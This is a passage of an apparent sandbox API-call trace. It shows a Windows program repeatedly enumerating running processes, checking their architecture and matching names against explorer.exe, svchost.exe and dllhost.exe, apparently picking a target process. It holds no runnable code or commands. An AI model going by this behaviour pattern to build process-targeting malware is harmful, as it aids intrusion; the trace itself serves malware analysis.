th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0225.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0225.114] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.114] CloseHandle (hObject=0xd8) returned 1 [0225.114] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.114] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0225.114] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0225.115] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0225.115] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0225.115] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0225.116] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0225.116] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0225.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0225.117] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.117] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0225.117] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.117] CloseHandle (hObject=0xd8) returned 1 [0225.117] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0225.117] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0225.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0225.118] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.118] CloseHandle (hObject=0xd8) returned 1 [0225.118] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0225.118] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0225.118] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0225.118] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0225.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0225.119] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0225.119] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.119] CloseHandle (hObject=0xd8) returned 1 [0225.119] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0225.120] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.120] CloseHandle (hObject=0xd8) returned 1 [0225.120] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0225.120] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.120] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0225.120] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.120] CloseHandle (hObject=0xd8) returned 1 [0225.120] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0225.121] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0225.121] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0225.121] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0225.121] CloseHandle (hObject=0xd8) returned 1 [0225.121] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0225.122] CloseHandle (hObject=0xd4) returned 1 [0225.122] Sleep (dwMilliseconds=0x3e8) [0226.131] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0226.133] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0226.134] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0226.134] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0226.134] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0226.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0226.135] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0226.136] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0226.136] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0226.136] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0226.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0226.137] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0226.137] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0226.137] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0226.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0226.138] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0226.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0226.139] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0226.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0226.139] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0226.140] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0226.141] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0226.141] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0226.142] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0226.142] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0226.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0226.143] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0226.143] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0226.144] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0226.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0226.144] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.144] CloseHandle (hObject=0xd8) returned 1 [0226.144] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0226.144] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0226.144] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0226.144] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0226.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0226.145] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0226.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0226.145] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.145] CloseHandle (hObject=0xd8) returned 1 [0226.145] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0226.145] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0226.145] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0226.145] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0226.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0226.146] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0226.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0226.147] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0226.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0226.147] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.147] CloseHandle (hObject=0xd8) returned 1 [0226.147] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0226.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0226.148] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.148] CloseHandle (hObject=0xd8) returned 1 [0226.148] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0226.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0226.148] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.148] CloseHandle (hObject=0xd8) returned 1 [0226.148] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0226.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0226.149] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.149] CloseHandle (hObject=0xd8) returned 1 [0226.149] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0226.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0226.150] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.150] CloseHandle (hObject=0xd8) returned 1 [0226.150] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0226.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0226.150] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.150] CloseHandle (hObject=0xd8) returned 1 [0226.150] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0226.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0226.151] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.151] CloseHandle (hObject=0xd8) returned 1 [0226.151] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0226.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0226.151] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.151] CloseHandle (hObject=0xd8) returned 1 [0226.151] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0226.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0226.152] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.152] CloseHandle (hObject=0xd8) returned 1 [0226.152] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0226.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0226.152] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.153] CloseHandle (hObject=0xd8) returned 1 [0226.153] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0226.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0226.153] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.153] CloseHandle (hObject=0xd8) returned 1 [0226.153] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0226.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0226.154] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.154] CloseHandle (hObject=0xd8) returned 1 [0226.154] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0226.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0226.154] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.154] CloseHandle (hObject=0xd8) returned 1 [0226.154] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0226.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0226.155] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.155] CloseHandle (hObject=0xd8) returned 1 [0226.155] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0226.155] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0226.155] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0226.156] CloseHandle (hObject=0xd8) returned 1 [0226.156] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 